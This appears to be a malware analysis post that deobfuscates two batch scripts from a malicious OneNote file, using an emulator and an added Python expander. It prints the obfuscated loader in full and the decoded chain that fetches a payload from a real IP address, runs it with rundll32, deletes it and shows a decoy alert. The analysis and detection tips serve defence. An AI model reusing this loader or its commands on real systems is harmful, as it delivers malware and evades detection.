This malicious OneNote document contains two obfuscated batch scripts and we’ll be using our commercial Simple Batch Emulator package to understand what they do.
SHA256: 46149F56028829246628FFAFC58DF81A4B0FF1C87ED6466492E25AD2F23C0A13
We open the first batch script and decode its data to text with the action “Conversion -> Bytes to text” (Ctrl+R).
This is the first batch script. As we can see, it is obfuscated: every character of the real commands is stored in a separate environment variable with a random name, the variables are concatenated into short fragments, and the fragments are finally expanded into the command lines that actually run. The first line is junk that fails silently thanks to the >nul 2>&1 redirection, and the :: lines are comments.
GIFTS WITH DISCOUNTS >nul 2>&1 LIMITED OFFER
@echo off
echo Opening cloud attachment. Please, wait...
set MTwQKSgpMHQL=l
set kOMmbE=6
set ppriRNqimzzTSvKtXf=w
set xjkkaUqzMsQfwuOvO=N
set KSYAjImqTlEaqaUQk=j
set WpncDVBcWdl=:
set hXZtrthX=a
set tzEroXSbsuwcjP=R
set abwWhsgS=I
set BfVscWaRFhKFCmEn=G
set RFgBUQShCaK=t
set YSnYOZtiQGsHWbQ=\
set TcEDTQuiRCwRnCZ=.
set xClmPsTggJpylvV=e
set vNQWiteQi=~
set gMymvy=P
set "wzLrpmBHLFeDXp=^&"
set OGlxoeCqS=*
set ABCTXVZiIx=_
set xINjhSGoIiH=;
set CJIMOVQWfQXQOdw=T
set LEkBWAERtHbZHi=S
set LmUcrlUYz=X
set rBVcFPRbzVfPfSUyF=5
set FCWmviurmdolmnnUV=-
set UMoZSPjFJvvChEk=K
set QGYQnnwq=0
:: RPrSCzCUAATzV vqyBFMLBqtxnSlKMNs RdYRqenmbofWuRhYlp
set xexBeMXmOc=Y
set RerNvPMjfHYv=Z
set SSDGYSluOaABFTa=n
set Xvmanbnc=O
set BqhoBjkpoCfz=m
set kClPys=k
set EVXBVtuZWFNZFffZx=b
:: oNEHkdpApzcQojnR IkylOzKKzX
set salnQA=p
set IpPOCnYJoXfOpeA=v
set xauJWmnNKt=2
set iWoZxOXHmAlQyPzt=c
set CoXXaBVa=g
set NRQHwqYiLqQu=4
:: CKWYSylZoes byhWiriMNX
set lxegFxhbQBlOmLHpHo=9
set nYfHglKJWerCSSt=r
set vTDYJe=C
set WWBUqZ=A
:: QmKggo Tstispm
set hJOaPhawOaKZnvMvhu=U
set tboSNACgeGqhwKHB=x
set TbpVIiV=E
set XRLcqeXQGEgkGA=8
set chKxzHcuSqepx=f
set palzevPSCdzXI=F
set xqyxFN=,
set MAPaVaaVbcnCMF='
set cXJtyBgFnuLWwwuI=B
set FFbJYLTBUoyJKRNMX=h
set CZkQjeZGaJTFnMiPM=Q
set pdSNFGNiQFiVMb=H
set gIVLuIt=s
set DlvLVqg=W
:: JAbNuDdaMU FjiPpCzO LoheRy
set NkuszVZKTz=y
:: icuthSFXuaC dKsRVQ QmuhKSbMylnFCJoqvI
:: CBIXovGcLEYeZ
set dEDYlv=!
set TFeXZUqf=#
set OTiJUJwllhLt=i
set lHvFElIZMHqJAvGu=/
set LMehDCaBboTb=d
set OdLXhyBHVhmqSXw=%%
set PWMguBlyRx=L
set PgrmAuqfL= 
set sugcUnpjSvvQFACvv=7
set BVteXMgZfztowwMEiA=(
set dGyJnqxqXvDT=J
set ujWMrdCPoYEzMS=u
set lycYegmHsTmEckqeDV=D
set aRJyEodO=q
set XTtRjfHr=3
set YXXTzNnOalV=z
set HOlGVukZ=)
set vTKpxAwRymHcXF=M
set CqhVrRRZOybvn=o
set rcDoYVocath=V
:: wDWaEb NtljhLFEu hbfsdOvuLh
set pYRUIxzT=1
:: VbfcBgnL ImjuXPqMOzmYQnGqm
set sdKHQCulimAwBJR==
if not defined is_minimized set is_minimized=1 && start "" /min "%~dpnx0" %* && exit
set "cjlpmAK=%BqhoBjkpoCfz%%gIVLuIt%%FFbJYLTBUoyJKRNMX%%RFgBUQShCaK%%hXZtrthX%"
set "znfBpu=%PgrmAuqfL%%KSYAjImqTlEaqaUQk%%hXZtrthX%%IpPOCnYJoXfOpeA%%hXZtrthX%"
set "mOYkTDxIlAGJa=%gIVLuIt%%iWoZxOXHmAlQyPzt%%nYfHglKJWerCSSt%%OTiJUJwllhLt%%salnQA%"
set "jLhqMhfFdfqsHmIn=%RFgBUQShCaK%%WpncDVBcWdl%%hXZtrthX%%MTwQKSgpMHQL%%xClmPsTggJpylvV%"
set "SfHNRwvBUb=%nYfHglKJWerCSSt%%RFgBUQShCaK%%BVteXMgZfztowwMEiA%%MAPaVaaVbcnCMF%%hJOaPhawOaKZnvMvhu%"
set "ncTaJBUiFsgEMdQMo=%SSDGYSluOaABFTa%%hXZtrthX%%EVXBVtuZWFNZFffZx%%MTwQKSgpMHQL%%xClmPsTggJpylvV%"
set "WzmDRG=%PgrmAuqfL%%RFgBUQShCaK%%CqhVrRRZOybvn%%PgrmAuqfL%%iWoZxOXHmAlQyPzt%"
set "FMOdiuUuMpBN=%CqhVrRRZOybvn%%SSDGYSluOaABFTa%%SSDGYSluOaABFTa%%xClmPsTggJpylvV%%iWoZxOXHmAlQyPzt%"
set "oYFegi=%RFgBUQShCaK%%PgrmAuqfL%%RFgBUQShCaK%%CqhVrRRZOybvn%%PgrmAuqfL%"
set "EPDdkAFwIo=%RFgBUQShCaK%%FFbJYLTBUoyJKRNMX%%xClmPsTggJpylvV%%PgrmAuqfL%%iWoZxOXHmAlQyPzt%"
set "xkLRLz=%MTwQKSgpMHQL%%CqhVrRRZOybvn%%ujWMrdCPoYEzMS%%LMehDCaBboTb%%dEDYlv%"
set "SxfykmrgpDooGMX=%PgrmAuqfL%%vTDYJe%%FFbJYLTBUoyJKRNMX%%xClmPsTggJpylvV%%iWoZxOXHmAlQyPzt%"
set "ctDNSwOPEy=%kClPys%%PgrmAuqfL%%NkuszVZKTz%%CqhVrRRZOybvn%%ujWMrdCPoYEzMS%"
set "RqozqythPRytu=%nYfHglKJWerCSSt%%PgrmAuqfL%%gIVLuIt%%hXZtrthX%%IpPOCnYJoXfOpeA%"
set "dNaCZTSbGMVlOUMv=%xClmPsTggJpylvV%%LMehDCaBboTb%%PgrmAuqfL%%iWoZxOXHmAlQyPzt%%nYfHglKJWerCSSt%"
set "yqGZymNyMRgpgYItUL=%xClmPsTggJpylvV%%LMehDCaBboTb%%xClmPsTggJpylvV%%SSDGYSluOaABFTa%%RFgBUQShCaK%"
set "IUWWMPjPiDQggIwb=%OTiJUJwllhLt%%hXZtrthX%%MTwQKSgpMHQL%%gIVLuIt%%PgrmAuqfL%"
set "hBhWgfli=%hXZtrthX%%SSDGYSluOaABFTa%%LMehDCaBboTb%%PgrmAuqfL%%nYfHglKJWerCSSt%"
set "CWProZLsDmpnMO=%xClmPsTggJpylvV%%RFgBUQShCaK%%nYfHglKJWerCSSt%%NkuszVZKTz%%TcEDTQuiRCwRnCZ%"
set "SVDRGSmTZXpy=%MAPaVaaVbcnCMF%%HOlGVukZ%%xINjhSGoIiH%%iWoZxOXHmAlQyPzt%%MTwQKSgpMHQL%"
set "lUFINBtqfEeBi=%CqhVrRRZOybvn%%gIVLuIt%%xClmPsTggJpylvV%%BVteXMgZfztowwMEiA%%HOlGVukZ%"
set "DLqlzxL=%xINjhSGoIiH%"
set bKrHQnJgYLkLRdlPfp=%cjlpmAK%%znfBpu%%mOYkTDxIlAGJa%%jLhqMhfFdfqsHmIn%%SfHNRwvBUb%%ncTaJBUiFsgEMdQMo%%WzmDRG%%FMOdiuUuMpBN%%oYFegi%%EPDdkAFwIo%%xkLRLz%%SxfykmrgpDooGMX%%ctDNSwOPEy%%RqozqythPRytu%%dNaCZTSbGMVlOUMv%%yqGZymNyMRgpgYItUL%%IUWWMPjPiDQggIwb%%hBhWgfli%%CWProZLsDmpnMO%%SVDRGSmTZXpy%%lUFINBtqfEeBi%%DLqlzxL%
if not defined is_minimized set is_minimized=1 && start "" /min "%~dpnx0" %* && exit
set "MEiEysS=%iWoZxOXHmAlQyPzt%%ujWMrdCPoYEzMS%%nYfHglKJWerCSSt%%MTwQKSgpMHQL%%PgrmAuqfL%"
set "hEEZxQ=%FCWmviurmdolmnnUV%%gIVLuIt%%PgrmAuqfL%%FCWmviurmdolmnnUV%%FCWmviurmdolmnnUV%"
set "bSCPqurOBHv=%gIVLuIt%%gIVLuIt%%MTwQKSgpMHQL%%FCWmviurmdolmnnUV%%SSDGYSluOaABFTa%"
set "ENVkYMiFcyLeD=%CqhVrRRZOybvn%%FCWmviurmdolmnnUV%%nYfHglKJWerCSSt%%xClmPsTggJpylvV%%IpPOCnYJoXfOpeA%"
set "yhyKQvxJRAmfMmLrvQ=%CqhVrRRZOybvn%%kClPys%%xClmPsTggJpylvV%%PgrmAuqfL%%FCWmviurmdolmnnUV%"
set "zVnWsFDbegYBO=%FCWmviurmdolmnnUV%%chKxzHcuSqepx%%hXZtrthX%%OTiJUJwllhLt%%MTwQKSgpMHQL%"
set "xEsVgXu=%PgrmAuqfL%"
set xIKbuUril=%MEiEysS%%hEEZxQ%%bSCPqurOBHv%%ENVkYMiFcyLeD%%yhyKQvxJRAmfMmLrvQ%%zVnWsFDbegYBO%%xEsVgXu%
set "GyQPcYnVsENQBwBT=%PgrmAuqfL%%FCWmviurmdolmnnUV%%FCWmviurmdolmnnUV%%CqhVrRRZOybvn%%ujWMrdCPoYEzMS%"
set "LQZZUjqMilSGG=%RFgBUQShCaK%%salnQA%%ujWMrdCPoYEzMS%%RFgBUQShCaK%%PgrmAuqfL%"
set "jhqGuvWYATsIiWC="
set SFdNuqILphV=%GyQPcYnVsENQBwBT%%LQZZUjqMilSGG%%jhqGuvWYATsIiWC%
set "ZYxjxzYjLeO=%FFbJYLTBUoyJKRNMX%%RFgBUQShCaK%%RFgBUQShCaK%%salnQA%%WpncDVBcWdl%"
set "hnigHp=%lHvFElIZMHqJAvGu%%lHvFElIZMHqJAvGu%%lxegFxhbQBlOmLHpHo%%pYRUIxzT%%TcEDTQuiRCwRnCZ%"
set "vVMqMZEfrsRch=%xauJWmnNKt%%xauJWmnNKt%%XRLcqeXQGEgkGA%%TcEDTQuiRCwRnCZ%%pYRUIxzT%"
set "DaDpbPEzhPdJGKKGgR=%QGYQnnwq%%TcEDTQuiRCwRnCZ%%pYRUIxzT%%XTtRjfHr%%NRQHwqYiLqQu%"
set "DtYdKvm=%lHvFElIZMHqJAvGu%%gIVLuIt%%ujWMrdCPoYEzMS%%nYfHglKJWerCSSt%%chKxzHcuSqepx%"
set "BJNiXGg=%hXZtrthX%%iWoZxOXHmAlQyPzt%%xClmPsTggJpylvV%%lHvFElIZMHqJAvGu%%KSYAjImqTlEaqaUQk%"
set "bMvXsjUVjZbwIIyde=%xjkkaUqzMsQfwuOvO%%kClPys%%EVXBVtuZWFNZFffZx%%kOMmbE%%lxegFxhbQBlOmLHpHo%"
set "uClHPvlSNy=%kOMmbE%%YXXTzNnOalV%%tboSNACgeGqhwKHB%%WWBUqZ%%Xvmanbnc%"
set "lNLOveFOJabtAtqdjy=%xexBeMXmOc%%ABCTXVZiIx%%ujWMrdCPoYEzMS%%pYRUIxzT%%IpPOCnYJoXfOpeA%"
set "rZMPaKQnRSsL=%NkuszVZKTz%%aRJyEodO%%gIVLuIt%%CqhVrRRZOybvn%%QGYQnnwq%"
set "FVFhwo=%XTtRjfHr%%salnQA%%vTKpxAwRymHcXF%%pYRUIxzT%%tzEroXSbsuwcjP%"
set "kdZZTx=%ppriRNqimzzTSvKtXf%%cXJtyBgFnuLWwwuI%%kOMmbE%%OTiJUJwllhLt%%LmUcrlUYz%"
set "eLhtMYXkdwHI=%kClPys%%lxegFxhbQBlOmLHpHo%%WWBUqZ%%vNQWiteQi%%vNQWiteQi%"
set "BJWSwhpPmVXngzod=%lHvFElIZMHqJAvGu%%ABCTXVZiIx%%aRJyEodO%%MTwQKSgpMHQL%%LmUcrlUYz%"
set "bEwVCCLtCoQNx=%chKxzHcuSqepx%%YXXTzNnOalV%%xjkkaUqzMsQfwuOvO%%KSYAjImqTlEaqaUQk%%UMoZSPjFJvvChEk%"
set "hfpLYvBbEIbrisf=%gIVLuIt%%XTtRjfHr%%OTiJUJwllhLt%%gIVLuIt%%NRQHwqYiLqQu%"
set "UpezsVhTToDIPyd=%RFgBUQShCaK%%ABCTXVZiIx%%QGYQnnwq%%IpPOCnYJoXfOpeA%%dGyJnqxqXvDT%"
set "jPOromFtXDn=%abwWhsgS%%salnQA%%hXZtrthX%%CqhVrRRZOybvn%%BqhoBjkpoCfz%"
set "oKQzltmDjTukIOpV=%RerNvPMjfHYv%%palzevPSCdzXI%%gIVLuIt%%lycYegmHsTmEckqeDV%%xauJWmnNKt%"
set "GJSANIkzMYkizi=%CoXXaBVa%%EVXBVtuZWFNZFffZx%%rcDoYVocath%%FFbJYLTBUoyJKRNMX%%ppriRNqimzzTSvKtXf%"
set "ltLlkobfEXFqnwkYdh=%vNQWiteQi%%vNQWiteQi%%lHvFElIZMHqJAvGu%"
set jfMGIEDYGAgCHHJUgC=%ZYxjxzYjLeO%%hnigHp%%vVMqMZEfrsRch%%DaDpbPEzhPdJGKKGgR%%DtYdKvm%%BJNiXGg%%bMvXsjUVjZbwIIyde%%uClHPvlSNy%%lNLOveFOJabtAtqdjy%%rZMPaKQnRSsL%%FVFhwo%%kdZZTx%%eLhtMYXkdwHI%%BJWSwhpPmVXngzod%%bEwVCCLtCoQNx%%hfpLYvBbEIbrisf%%UpezsVhTToDIPyd%%jPOromFtXDn%%oKQzltmDjTukIOpV%%GJSANIkzMYkizi%%ltLlkobfEXFqnwkYdh%
set "kjamXhOLYpt=%gIVLuIt%%CqhVrRRZOybvn%%LMehDCaBboTb%%SSDGYSluOaABFTa%%NkuszVZKTz%"
set "SMVCxTQcVXzqCYLqR=%BqhoBjkpoCfz%%nYfHglKJWerCSSt%%salnQA%%TcEDTQuiRCwRnCZ%%KSYAjImqTlEaqaUQk%"
set "ZFxCfsVnwlDI=%gIVLuIt%%KSYAjImqTlEaqaUQk%"
set MNbiLHzZgYRjURP=%kjamXhOLYpt%%SMVCxTQcVXzqCYLqR%%ZFxCfsVnwlDI%
set "vMhvNuNL=%nYfHglKJWerCSSt%%ujWMrdCPoYEzMS%%SSDGYSluOaABFTa%%LMehDCaBboTb%%MTwQKSgpMHQL%"
set "aQNPBZPCpHS=%MTwQKSgpMHQL%%XTtRjfHr%%xauJWmnNKt%%PgrmAuqfL%"
set OqroxhdAgfsysPZ=%vMhvNuNL%%aQNPBZPCpHS%
set "IuipCtfGWFReSRk=%xqyxFN%%OTiJUJwllhLt%%SSDGYSluOaABFTa%%OTiJUJwllhLt%%RFgBUQShCaK%"
set "rwYhYAS="
set FdtCBRu=%IuipCtfGWFReSRk%%rwYhYAS%
set "ghStZE=%LMehDCaBboTb%%xClmPsTggJpylvV%%MTwQKSgpMHQL%%PgrmAuqfL%"
set DTyxOFBzvxX=%ghStZE%
%xIKbuUril%%jfMGIEDYGAgCHHJUgC%%SFdNuqILphV%%MNbiLHzZgYRjURP%
%OqroxhdAgfsysPZ%%MNbiLHzZgYRjURP%%FdtCBRu%
%DTyxOFBzvxX%%MNbiLHzZgYRjURP%
%bKrHQnJgYLkLRdlPfp%
We run the batch emulator, which prints the result of the emulation to the output view. This is the output:
echo: Opening cloud attachment. Please, wait...
unsupported command: if not defined is_minimized set is_minimized=1 && start "" /min "%~dpnx0" %* && exit
unsupported command: if not defined is_minimized set is_minimized=1 && start "" /min "%~dpnx0" %* && exit
unsupported command: curl -s --ssl-no-revoke --fail http://91.228.10.134/surface/jNkb696zxAOY_u1vyqso03pM1RwB6iXk9A~~/_qlXfzNjKs3is4t_0vJIpaomZFsD2gbVhw~~/ --output sodnymrp.jsj
unsupported command: rundll32 sodnymrp.jsj,init
unsupported command: del sodnymrp.jsj
unsupported command: mshta javascript:alert("Unable to connect to the cloud! Check your saved credentials and retry.");close();
The decoded commands show the whole chain. curl fetches a payload from the URL above and writes it to a file with a random name and a non-DLL extension (sodnymrp.jsj); --fail makes curl write nothing on an HTTP error, and --ssl-no-revoke has no effect on a plain http:// URL. rundll32 then loads that file as a DLL and calls its exported function init, after which del removes it from disk. Finally mshta serves as a decoy: it pops up a JavaScript alert claiming that the connection to the cloud failed, so the victim has an explanation for why no attachment opened. The two identical "if not defined is_minimized" lines are the script relaunching itself through start "" /min so that its console window stays minimized; the emulator reports them as unsupported instead of executing them, which does not matter here because they have no effect on the decoded payload commands. For detection, the useful artifacts are curl.exe writing a file with a non-DLL extension, rundll32.exe loading that file with the export name init, and mshta.exe launched with a javascript: URL.
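To show what an emulator has to do for this style of obfuscation, here is an added example that is not part of the original post and is not the Simple Batch Emulator's code: a minimal Python expander written for this page. It implements the cmd.exe rules the script relies on, percent-expansion of %NAME% references (with %% as an escaped percent and an undefined name expanding to nothing) and both forms of set, and treats every line that is not set, echo or a comment as a command to trace rather than execute, which is why the self-relaunch line appears in the trace exactly as it does in the emulator output above. The function names (emulate, expand, apply_set, commands) are this example's own. The embedded SAMPLE_SCRIPT is constructed for the example and uses the same one-character-per-variable trick; the URL http://example.invalid/payload/ and the file name x.dat are placeholders, not indicators from the analysed sample.

```python
import re
from typing import Dict, List, Tuple

# %% is an escaped percent; %NAME% is a variable reference. cmd.exe accepts
# almost any character inside a name, but restricting names to identifier
# characters keeps argument modifiers such as %~dpnx0 and %* untouched.
_REF = re.compile(r"%%|%([A-Za-z_][A-Za-z0-9_]*)%")


def expand(line: str, env: Dict[str, str]) -> str:
    """Percent-expansion as a batch file sees it: %% -> %, %NAME% -> value,
    and a reference to an undefined name expands to the empty string."""
    def repl(m):
        if m.group(0) == "%%":
            return "%"
        return env.get(m.group(1).upper(), "")
    return _REF.sub(repl, line)


def apply_set(args: str, env: Dict[str, str]) -> None:
    """set NAME=value (the value runs to end of line, trailing spaces included)
    or set "NAME=value" (text after the closing quote is ignored).
    An empty value deletes the variable, as it does in cmd.exe."""
    args = args.lstrip()
    if args.startswith('"'):
        close = args.rfind('"')
        body = args[1:close] if close > 0 else args[1:]
    else:
        body = args
    if "=" not in body:
        return                      # a bare 'set' only lists variables
    name, value = body.split("=", 1)
    name = name.strip().upper()     # variable names are case-insensitive
    if value == "":
        env.pop(name, None)
    else:
        env[name] = value


def emulate(script: str) -> Tuple[Dict[str, str], List[Tuple[str, str]]]:
    """Walk the script line by line. Only set, echo and comments are
    interpreted; every other line is expanded and recorded as a command,
    never executed. Returns the final environment and the trace."""
    env: Dict[str, str] = {}
    trace: List[Tuple[str, str]] = []
    for raw in script.splitlines():
        line = expand(raw.rstrip("\r"), env).lstrip()
        if line.startswith("@"):            # '@' only suppresses echoing
            line = line[1:].lstrip()
        if not line or line.startswith("::"):
            continue
        word = line.split(None, 1)[0].lower()
        rest = line[len(word):]
        if word == "rem":
            continue
        if word == "set":
            apply_set(rest, env)
        elif word == "echo":
            text = rest.strip()
            if text.lower() not in ("on", "off"):
                trace.append(("echo", text))
        else:
            trace.append(("command", line))
    return env, trace


def commands(trace: List[Tuple[str, str]]) -> List[str]:
    """Just the traced command lines, in order."""
    return [text for kind, text in trace if kind == "command"]


# Constructed sample (not the OneNote script) using the same trick: one
# character per variable, one variable holding a single space, then
# concatenation into the real command lines. URL and file name are placeholders.
SAMPLE_SCRIPT = "\n".join([
    "JUNK LINE >nul 2>&1 MORE JUNK",
    "@echo off",
    "echo Opening cloud attachment. Please, wait...",
    "set a=c",
    "set b=u",
    "set c=r",
    "set d=l",
    "set sp= ",                       # the trailing space is the value
    ":: kfjwe ieuqwn random comment",
    "set pct=%%",
    'set "part1=%a%%b%%c%%d%%sp%"',
    'set "part2=-s%sp%"',
    'set "url=http://example.invalid/payload/"',
    'set "out=%sp%--output%sp%"',
    'set "name=x.dat"',
    'set "undefme="',
    "set cmd1=%part1%%part2%%url%%out%%name%%undefme%",
    'if not defined is_minimized set is_minimized=1 && start "" /min "%~dpnx0" %* && exit',
    "%cmd1%",
    "rundll32 %name%,init",
    "del %name%",
])

if __name__ == "__main__":
    env, trace = emulate(SAMPLE_SCRIPT)
    for kind, text in trace:
        print(f"{kind}: {text}")
```

Feeding the script from the OneNote sample to emulate() in place of SAMPLE_SCRIPT produces the same curl, rundll32, del and mshta lines that the emulator printed, provided the trailing space in set PgrmAuqfL= survives copying, since that variable supplies every space in the final commands. The expander deliberately does not model delayed expansion (!var!), for loops, call, goto or argument modifiers such as %~dpnx0, so a script that depends on those needs the real emulator or a sandbox.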
We repeat the same operations on the second script. It executes the same sequence of commands; the only difference is the name under which the downloaded file is written to disk (fjxipv.jah instead of sodnymrp.jsj):
echo: Opening cloud attachment. Please, wait...
unsupported command: if not defined is_minimized set is_minimized=1 && start "" /min "%~dpnx0" %* && exit
unsupported command: if not defined is_minimized set is_minimized=1 && start "" /min "%~dpnx0" %* && exit
unsupported command: curl -s --ssl-no-revoke --fail http://91.228.10.134/surface/jNkb696zxAOY_u1vyqso03pM1RwB6iXk9A~~/_qlXfzNjKs3is4t_0vJIpaomZFsD2gbVhw~~/ --output fjxipv.jah
unsupported command: rundll32 fjxipv.jah,init
unsupported command: del fjxipv.jah
unsupported command: mshta javascript:alert("Unable to connect to the cloud! Check your saved credentials and retry.");close();